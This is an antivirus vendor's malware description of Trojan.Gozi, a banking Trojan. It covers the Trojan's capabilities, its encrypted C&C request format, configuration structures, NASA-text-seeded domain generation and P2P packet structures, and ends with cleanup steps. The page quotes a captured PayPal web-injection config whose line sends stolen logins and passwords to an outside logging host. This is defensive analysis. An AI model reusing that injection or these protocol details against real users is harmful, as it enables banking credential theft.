Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Trojan.Gozi

Added to the Dr.Web virus database: 2016-03-18

Virus description added:

Trojan.Gozi

sha1 (p2p version)0fb30e03f71f0a20340ca0cb634e6250c14a1109
sha1 installer1720115a8a646f4a0a3741cec7266b82ff065a7e
sha1 client.dll x320690ef42ff894dd85be873b4d95183a1af5f9a72
sha1 client.dll x642d9cb08d9f4ed28c55a93355c7e5ae39b1f43488
sha1 vnc32 3bb13d9d4b4eaabb314d90d294119d2f982736ac
sha1 vnc64 17930b20f98ac7e92d28598901710254f1cf6315

A modified version of a well-known banking Trojan that is able to create P2P botnet. It can execute the following functions:

  • Steals login credentials from web data forms (formgrabbing)
  • Loggs keystrokes on the infected computer (keylogging)
  • Injects arbitrary content into webpages loaded in browser windows (web injections)
  • Uses Virtual Network Computing (VNC) in order to get remote access to the computer’s desktop
  • Runs the SOCKS proxy server upon a command
  • Downloads and installs plug-ins

To transmit information, the Trojan uses HTTP protocol. Information is encrypted in the GET request that looks as follows:

http://made****h.pw/images/EYI/uE4P5lkUATTfrO/L4Iv7VEvWWlYBM9qKuE67ixOoebU1ef9HHS7Xvwhns0o
bfoegeauxh8PajwSUrNkSFTtqnU/Fy/MyNURytngSxc_2FYvcf9O
98PFCv2bBHEE//jMiPVxyqqgQ/f_2/FBgMUnmhszPJ5_2BuSA.gif

After decryption, the following line is obtained:

jkwerhw=sdalfwewesd3&server=12&crc=7b033&version=214721&user=55deba95d542febda
b0e1570986cdaf0&soft=1&id=1045

Where:
server, id—retrieved from the Trojan’s configuration;
user—unique bot identifier;
crc—the crc32 function is used for configuration (if this function is missing, the value is obtained using the GetTickCount function).

The Trojan sends requests to various types of scripts:

  • .jpeg—request for web injection configuration;
  • .gif—request for a personal task;
  • .bmp—sending logs to the server; data is transmitted as multipart/form-data.

The server’s response is encrypted with the RSA+Serpent+XOR algorithms. If the message contains information about web injections, they are compressed with aplib. Such-like messages consist of separate blocks:

struct block_t
{
    DWORD size;
    BYTE data[size]; //a line with a zero character in the end
}

An example of a web injection into the PayPal webpage:

*paypal.*
id="js_transactionCollection"
id="js_transactionCollection" style="visibility:hidden"
...
Order
*paypal.com/*/cgi-bin/merchantpaymentweb*
PROCESS
check.unitssl.com/log.php?action=log&text=pp;l=@login@;p=@pass@&botid=@ID@
*paypal.com/*/cgi-bin/merchantpaymentweb*
POST
login_email
login
*paypal.com/*/cgi-bin/merchantpaymentweb*
POST
login_password
pass

The last section of the executable file is used to store information on the Trojan’s configuration directory:

2E 72 65 6C-6F 63 00 00-00 30 00 00-00 10 02 00  .reloc   0   ►☻
00 26 00 00-00 D8 01 00-00 00 00 00-00 00 00 00   &   ╪☺
00 00 00 00-40 00 00 40-00 00 00 00-00 00 00 00      @  @
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
4A 31 00 00-00 32 02 00-84 00 00 00-64 5E 28 E1  J1   2☻ Д   d^(с
00 01 01 00-4A 31 00 00-00 34 02 00-81 01 00 00   ☺☺ J1   4☻ Б☺
CB AF 22 D7-00 20 01 00-00 00 00 00-00 00 00 00  ╦п"╫  ☺
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00

This section can be found by the 0x314a value and looks as follows:

struct config_block_t
{
  WORD magic;
  WORD numHashes; 
  DWORD pos; //rva of the configuration
  DWORD size; //size
  DWORD id; //configuration ID
  DWORD flag; //0x10000—aplib compression
  DWORD hashes[numHashes];
};

If the relevant flag is set, all retrieved data is unpacked with aplib. This data together with associated parameters looks as follows:

{"GROUP": "1045", "1481529637": "10", "SENDTIMEOUT": "200", "BCTIMEOUT": "10",
"CONFIGFAILTIMEOUT": "200", "TASKTIMEOUT": "200", "DGA_SEED": "1", "HOSTS": "127.0.0.1",
"SERVERKEY": "87654321POIUYTRE", "SERVER": "12", "KNOCKERTIMEOUT": "200",
"CONFIGTIMEOUT": "200", "287775871": "1"}

Where:

GROUP - id, SERVER—server in the request; 
DGA_SEED—DGA initialization constant;
SERVERKEY—key for serpent;
HOSTS—list of C&C servers with spaces.

Trojan.Gozi employs domain generation algorithm (DGA). To do this, the Trojan downloads a text file from the NASA server:

http://nssdc.gsfc.nasa.gov/planetary/text/pioneer-11_endops.txt

Using words containing in the text file, the Trojan calculates the current date, which allows it to generate a domain name of the C&C server, employing a special algorithm. Every 15 days, the Trojan automatically changes its control server address. All the transferred information is encrypted.

To generate P2P botnet, a kademlia-based protocol is used. UDP packets are encrypted with RC4 and have the following structure:

struct kad_t
{
    BYTE flag; //random value, except two lowest bits, 0 bit - a packet encrypted with sendKey, 1 bit - (1) a packet encrypted with sendKey=0 or (0) sendKey=nid1^nid2^nid3^nid4
    DWORD rndKey; //random component of the key
    kad_transport_t transport; //encrypted
    kad_head_t head; // encrypted
    BYTE data[]; // encrypted
}
 
struct kad_transport_t
{
    DWORD magic; //the 0x395F2EC1 value
    DWORD sendKey; //random value used to encrypt responses
    DWORD recvKey;
}
 
struct kad_head_t
{
    BYTE opType; //0xe4 - UDP KAD
    BYTE op; //commands of the protocol
    WORD size; //length of kad_t.data
};

Received and downloaded files are stored at:

%APPDATA%\\Microsoft\\{%08X-%04X-%04X-%04X-%08X%04X}\<md5hashOfName>

News about the Trojan

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android